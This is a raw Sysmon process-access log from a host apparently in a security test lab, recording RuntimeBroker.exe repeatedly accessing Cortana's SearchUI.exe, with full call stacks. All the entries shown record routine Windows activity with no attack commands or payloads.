13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x800000000000000012867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
